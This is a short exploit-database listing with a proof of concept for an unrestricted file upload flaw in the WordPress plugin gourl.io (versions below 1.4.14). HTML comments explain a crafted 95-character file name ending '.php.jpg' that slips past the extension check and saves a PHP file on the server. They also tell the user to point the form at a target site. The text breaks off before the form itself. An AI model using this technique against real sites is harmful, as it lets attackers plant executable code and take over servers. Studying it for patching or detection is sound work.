Exploits / Vulnerability Discovered : 2018-10-31 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin gourl.io < 1.4.14 file upload is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
<html>
<!--
GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi
CWE-434
After checking file extention substring was used for file name to select first 95 letter line #5655
So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
will upload a file with .php extention in website :)
-->
<body>
<!--
Replace http://127.0.0.1/wp/ with target wordpress website
Fill id param in form action to any active download product